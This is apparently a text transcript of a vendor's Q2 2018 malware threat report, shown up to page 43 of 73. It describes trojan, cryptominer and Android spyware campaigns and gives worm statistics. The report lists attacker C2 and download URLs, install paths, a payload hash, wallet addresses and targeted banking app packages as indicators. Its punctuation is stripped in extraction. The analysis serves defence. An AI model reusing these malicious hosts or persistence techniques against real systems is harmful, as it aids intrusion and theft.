Global Threat Report - comodo.com · Global Threat Report Q2 2018 Edition Page 4 of 73 2 Trojans...
Transcript of Global Threat Report - comodo.com · Global Threat Report Q2 2018 Edition Page 4 of 73 2 Trojans...
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
copy 2018 All Rights Reserved Comodo Security Solutions Inc
Global Threat Report
Brought to you by
Q2 2018 Edition
Global Threat Report Q2 2018 Edition
Page 1 of 73
Table of Contents
Contents 1 EXECUTIVE SUMMARY 3
11 OVERVIEW 3 12 NEW TRENDS 3
121 Trojans jumped to the top of the malware list 3 122 Cryptominers evolved into multifunctional malware 3 123 Android malware skyrocketed in variety 3 124 Geopolitical intelligence 3
2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA 4
21 THE MOST WIDESPREAD TROJAN 7 22 POWERSHELL-BASED ATTACK WITH EMOTET 8 23 FLAWED AMMYY RAT ATTACK BASED ON LEGITIMATE SOFTWARE 12 24 THE GROWTH OF FLAWED AMMYY ATTACKS FOR Q2 15 25 AMMYY ADMIN DISSEMINATION AROUND THE WORLD FOR Q2 15
3 CRYPTOMINER EVOLUTION 16
GOING FILELESS KILLING COMPETITORS CRASHING SYSTEMS 16 31 BADSHELL ATTACKS ENTERPRISES 16 32 WINSTARNSSMMINER A SYSTEM KILLER 19 33 COINMINER KILLS RIVALS 20 34 COINHIVE CHANGES ITS SKIN 22 35 CRYPTOCURRENCY CLIPBOARD HIJACKER INTERCEPTS TRANSFERS24
4 ANDROID DEVICES UNDER SIEGE 26
41 SPYING STEALING MINING 26 411 KevDroid 27 412 Zoo Park 29 413 MikeSpy 30 414 Xloader 30 415 Stalker Spy 31 416 Mystery Bot 32 417 FakeSpy 33 418 RedAlert 34 419 Hero Rat 34 4110 Sonvpay 35 4111 CoinHive 36
42 ANDROID MALWARE CATALOGUED BY MONTH 37 421 April 2018 37 422 May 2018 37 423 June 2018 38
Global Threat Report Q2 2018 Edition
Page 2 of 73
5 MALWARE IN Q2 2018 THE BIG PICTURE 39
51 STRATEGIC THREAT COMPUTER WORMS 40 511 Generic Worms 41 512 Net Worms 42 513 Email Worms 43 514 p2p Worms 44 515 IM Worms 45
52 HIGH THREAT MALWARE 46 521 Backdoors 47 522 Viruses 48 523 Trojans 49 524 Exploits 50
53 MEDIUM THREAT MALWARE 51 531 Constructor 52 532 Packers 53 533 Email Flooder 54 534 Virtual Tools 55 535 Jokes 56
54 LOW THREAT MALWARE APPLICATIONS 57 541 Applications 58 542 Unwanted Applications 59 543 Unsafe Applications 60
6 VERTICAL ANALYSIS 61
7 GEOPOLITICAL INTELLIGENCE 63
71 USA 63 72 CHINA 64 73 SOUTH KOREA 65 74 NORTH KOREA 66 75 ARMENIA 67 76 BELARUS 68 77 IRAQ 69 78 UKRAINE 70 79 CROATIA 71 710 FINLAND RUSSIA USA 72
8 CONCLUSIONS 73
Global Threat Report Q2 2018 Edition
Page 3 of 73
1 Executive summary
11 Overview
bull In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world bull The malware was detected in 237 countriesrsquotop-level domains bull Russia Turkey and India were the countries with the highest number of worm infections bull The United Kingdom had the highest proportion of detected backdoors bull Ukraine and Russia were the most common countries of detection for viruses bull Germany was the 1 country hit by trojans
12 New Trends 121 Trojans jumped to the top of the malware list The most dangerous sign is the unfolding merger of trojans and phishing emails that amplifies the spreading of the malware Attackers use trojans to deliver other malware and the Trojans surge accompanies a significant increase in other malware infections As such users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity
122 Cryptominers evolved into multifunctional malware Cryptomining decreased in quantity but grew in harmful capabilities As events in Q2 demonstrated this genre of malware is actively developing in two directions better hiding and stronger persistence Cryptominers have gained new features that let them fight antiviruses and deeply root in usersrsquo systems
123 Android malware skyrocketed in variety In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development Android devices have become attractive targets for cybercriminals because modern mobile device represents a treasure trove of data Spyware takes the lead in Android malware types Like real-world spies Android spyware constantly changes guises and methods of avoiding detection And its harmful potential goes up with every new version
124 Geopolitical intelligence Cyberattacks and malware spikes are often correlated with significant events in world politics Assignments of the US Secretary of State and CIA Director Armeniarsquos political revolution the Donald Trump and Vladimir Putin summit in Helsinki the Champions League final in Ukraine US - South Korean joint military exercises the anniversary of the 1989 Tiananmen Square protests and other events during Q2-2018 clearly demonstrate the existence of such correlations
Global Threat Report Q2 2018 Edition
Page 4 of 73
2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics
Malware Distribution by Type
Why are these changes inevitable
Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems
Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor
Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
